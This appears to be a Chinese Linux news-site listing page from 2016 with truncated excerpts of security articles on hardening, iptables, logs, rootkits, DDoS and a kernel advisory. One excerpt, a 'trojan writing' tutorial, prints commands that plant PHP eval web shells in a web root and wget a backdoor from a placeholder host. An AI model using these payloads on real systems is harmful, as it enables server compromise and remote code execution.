保护Linux系统安全 应该尽早开始

2016年10月21日 11 阅读

在操作系统中，大家感觉Windows漏洞很多，而Linux好像更安全些。当人们越来越热衷于寻找微软操作系统和软件的漏洞，使得Windows成为越来越多号称黑客的人攻击目标的时候，却往往忽略了世界上使用人数第二多的Linux操作系统。 其实1996年就出现了Linux平台下的第一个病毒Staog。据说这个病毒是由澳大利亚一个叫做VLAD的黑客组织用汇编语言写出的（这个组织在病毒光荣簿上留下了相当辉煌的印记，Windows 95下的第一个病毒程序Boza就...

自己动手 让Linux操作系统更安全

2016年10月21日 10 阅读

Linux系统比起Win来说更安全可靠,但是也并不是绝对安全的,通过以下几步,让你使用Linux操作系统的更放心。 1．为LILO增加开机口令 在/etc/lilo.conf文件中增加选项，从而使LILO启动时要求输入口令，以加强系统的安全性。具体设置如下: boot=/dev/hda map=/boot/map install=/boot/boot.b time-out=60 #等待1分钟 prompt default=linux pa...

Linux系统的一些安全配置 让你更放心

2016年10月21日 10 阅读

由于Linux的开源，使得Linux强大功能的背后，总是有些不尽人意的地方，为了使Linux达到一个最安全的程度，还要不断的来对Linux配置要下一番功夫。 所以一般要注意主机的包漏洞修补,放火墙的设置,关闭危险服务（端口）以及每日的日志分析. 再这里我们以端口来讲述一下安全方面的问题 什么是端口 一台主机的端口可以分为监听端口与随机取用的高级端口.所谓监听端口就是主机开启了哪些服务,那么这个服务会在Linux系统里启用一个端口来监听客户端的请求....

Linux系统的关机步骤与注意事项

2016年10月21日 10 阅读

在聊天时，一网友发来消息说Linux突然断电，数据没有保存，那么在企业中要怎么保证大家的数据保存到硬盘上了呢？这使我想到这个和windows的区别，当要关闭服务器的时候，如果有人连接到windows服务器上存取数据，windows会提示有人连接到当前的服务器，以方便我们通知用户做好保存数据的准备，那么Linux就没有这么的智能了，要我们自己人工提示用户。关于Linux的关机步骤，大部分的用户以为就使用shutdown －h now就万事大吉了，其实Linu...

Linux操作系统安全之了解日志工具

2016年10月21日 10 阅读

对于比较高明些的攻击者来说，进入Linux操作系统后，还应了解自己的“蛛丝马迹”并清除这些痕迹，自然就要了解一些日志工具了。（1）logchecklogchek 可以自动地检查日志文件，定期检查日志文件以发现违反安全规则以及异常的活动。它先把正常的日志信息剔除掉，把一些有问题的日志保留下来，然后把这些信息 email 给系统管理员。logcheck 用 logtail 程序记住上次已经读过的日志文件的位置，然后从这个位置开始处理新的日志信息。logchec...

安全教程 Linux下写入木马的方法解析

2016年10月21日 10 阅读

Linux下写入木马的方法:（1）echo "<？eval（$cmd）;？>" > /home/web/www/PREFIX/htdocs/mu.php（2）echo "<？fputs（fopen（"1.php","w+"）,"<？eval（$_POST[c]）;？>"）;？>" >test11.php（3）"system（"wget http://xxxxxx.com/backdoor -P /tmp"）"...

安全相关之Linux防火墙

2016年10月21日 10 阅读

ssh Linux ip 无法联接，man iptables检查是防火墙问题 便利用如下命令测试环境1） 重启后生效 开启： chkconfig iptables on 关闭： chkconfig iptables off2） 即时生效，重启后失效 开启： service iptables start 关闭： service iptables stop需要说明的是对于Linux下的其它服务都可以用以上命令执行开启和关闭操作。在开启了防火墙时，做如下设置，开...

Linux环境下病毒类型总结

2016年10月21日 10 阅读

虽然目前来说，Linux环境下的病毒少之又少，但是还是有的，掌握一定的知识对我们来说只有好处！1.感染ELF格式文件的病毒这类病毒以ELF格式的文件为主要感染目标，通过汇编或者C语言可以写出能感染ELF文件的病毒。Lindose病毒就是一种能感染ELF文件的病毒，当它发现一个ELF文件时，将检查被感染的机器类型。如果查找到匹配的类型，则查找该文件中是否有一部分大于2784字节（或十六进制AEO），如果有，病毒就会用自身代码覆盖它并添加宿主文件的相应部分的代...

运行 Apache 的 Linux服务器被神秘病毒感染

2016年10月21日 11 阅读

Linux公社消息:根据olidot报道,运行着 Linux/Apache 的服务器无意间被神秘病毒感染,数千电脑受影响的报告浮出水面，病毒利用 QuickTime, Yahoo！ Messenger 和 Windows 的漏洞传播。一个得知是否感染病毒的方法是看看你的电脑能否创建以数字开头的文件夹。事件的细节现在仍然不是很多, 当前最好的建议是预先加强服务器安全。受感染服务器全新安装Linux系统,以保证安全！Apache安全小组的Mark Cox称他们...

Linux操作系统中必须知道的安全命令

2016年10月21日 10 阅读

虽然Linux相对于Windows系统来说安全的多，但对于很多习惯了Windows系统的管理员来讲，如何保证Linux操作系统安全、可靠将会面临许多新的挑战。本文将重点介绍Linux系统安全的命令。passwd 1.作用passwd命令原来修改账户的登陆密码，使用权限是所有用户。2.格式passwd [选项] 账户名称3.主要参数-l：锁定已经命名的账户名称，只有具备超级用户权限的使用者方可使用。-u：解开账户锁定状态，只有具备超级用户权限的使用者方可使用...

设置Squid成功实现防盗链

2016年10月21日 10 阅读

Squid是一种用来缓冲Internet数据的软件。它是这样实现其功能的，接受来自人们需要下载的目标（object）的请求并适当地处理这些请求。也就是说，如果一个人想下载一web页面，他请求Squid为他取得这个页面。Squid随之连接到远程服务器（比如：http：//squid.nlanr.net/）并向这个页面发出请求。然后，Squid显式地聚集数据到客户端机器，而且同时复制一份。当下一次有人需要同一页面时，Squid可以简单地从磁盘中读到它，那样数据...

配置LIDS打造Linux内核安全入侵侦察系统

2016年10月21日 10 阅读

LIDS（ Linux入侵侦察系统）是Linux内核补丁和系统管理员工lidsadm），它加强了Linux内核。它在内核中实现了一种安全模式 -- 参考模式以及内核中的Mandatory Access Control（命令进入控制）模式。本文将阐述LIDS的功能和如何使用它来建立一个安全的Linux系统。 为什么选择LIDS 随着互连网上Linux越来越受欢迎 ,越来越多现有GNU/LINUX系统上的应用软件中的安全漏洞被发现。很多程序利用了程序员...

掌握Linux日志让系统更安全

2016年10月21日 10 阅读

Linux日志分析详细部分 Linux日志也是用户应该注意的地方之一。不要低估日志文件对网络安全的重要作用，因为日志文件能够详细记录系统每天发生的各种各样的事件。用户可以通过日志文件检查错误产生的原因，或者在受到攻击和黑客入侵时追踪攻击者的踪迹。日志的两个比较重要的作用是：审核和监测。配置好的Linux的日志非常强大。对于Linux系统而言，所有的日志文件都在/var/log下。默认情况下，Linux的日志文件已经足够强大，但没有记录FTP的活动。用户可...

Linux系统中用iptables实现NAT

2016年10月21日 10 阅读

本文主要介绍如何使用iptbales实现Linux2.4下的强大的NAT功能。关于iptables的详细语法请参考“用iptales实现包过虑型防火墙”一文。需要申明的是，本文绝对不是 NAT-HOWTO的简单重复或是中文版，在整个的叙述过程中，作者都在试图用自己的语言来表达自己的理解，自己的思想。 一、概述 1. 什么是NAT 在传统的标准的TCP/IP通信过程中，所有的路由器仅仅是充当一个中间人的角色，也就是通常所说的存储转发，路由器并不会对转...

Ubuntu 7.10中iptables详述

2016年10月21日 11 阅读

iptables详解总览用iptables -ADC 来指定链的规则，-A添加 -D删除 -C 修改iptables - [RI] chain rule num rule-specification[option]用iptables - RI 通过规则的顺序指定iptables -D chain rule num[option]删除指定规则iptables -[LFZ] [chain][option]用iptables -LFZ 链名 [选项]iptabl...

Linux操作系统预防病毒方案

2016年10月21日 10 阅读

也许你会问,Linux下防病毒是否是多余的？因为Linux本身具有抵抗病毒的能力.如果以非超级用户身份登录,一个恶意感染系统文件的程序将很难得逞.所以当我们看到使用Windows的朋友们要不辞辛劳地与美丽莎,切尔诺贝利,ExploreZip等病毒作斗争时,感到无比悲痛,因为我们丝毫不受这些病毒的威胁.然而,这种日子很快就要到头了,并不是由于Linux本身易受病毒感染,而是因为Linux要想得到企业的认可,就必须具备高度集成各种系统标准的能力,甚至要解决由...

Linux系统下入侵工具Knark的简述与防范

2016年10月21日 10 阅读

本文讨论了Linux系统下攻击者入侵成功以后常常使用的一些后门技术，并且对最着名的rootkit工具之一？knark进行了详细的分析，并且指出了在发现系统被入侵以后如何发现是否是kark及如何恢复。 什么是"rootkit"？ 入侵者入侵后往往会进行清理脚印和留后门等工作，最常使用的后门创建工具就是rootkit。不要被名字所迷惑，这个所谓的“rootkit”可不是给超级用户root用的，它是入侵者在入侵了一太主机后，用来做创建后门并加以伪装用的程序包...

DDoS七种攻技术方式及相关防御

2016年10月21日 10 阅读

DDOS攻击是现在最常见的一种黑客攻击方式，下面就给大家简单介绍一下DDOS的七种攻击方式。1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。2.Smurf：该攻击向一个子网的广播地址发一个带有特定请求（如ICMP回应请求）的包，并且将源地址伪装成想要...

瑞星杀毒软件2007光盘零售版是面向 Linux的？

2016年10月21日 10 阅读

先来个评论：这是用Linux系统作为杀毒系统的，以前是把dos当作Windows杀毒系统，现在换成Linux了，估计是看好Linux的硬件支持和性能吧！操作步骤先将计算机启动顺序设为光盘启动（具体方法详见计算机的相关使用说明）将瑞星杀毒软件 2007 版光盘放入光盘驱动器将事先制作好的瑞星 U 盘杀毒工具插入计算机 USB 接口，并确保连接正确（制作 U 盘杀毒工具的方法详见制作瑞星 U 盘杀毒工具）重新启动计算机， 系统将自动从光盘启动按照启动界面的提示...

Linux Kernel PowerPC chrp/setup.c指针引用漏洞及相应补丁

2016年10月21日 11 阅读

受影响系统：Linux kernel 2.4.21 - 2.6.18-53描述：Linux Kernel是开放源码操作系统Linux所使用的内核。Linux Kernel在PowerPC平台上执行里存在漏洞，本地攻击者可能利用此漏洞导致拒绝服务。当运行在PowerPC时，Linux Kernel的chrp/setup.c文件中的chrp_show_cpuinfo函数可能会出现崩溃。如果本地攻击者导致of_get_property函数失败的话，就会触发空指针...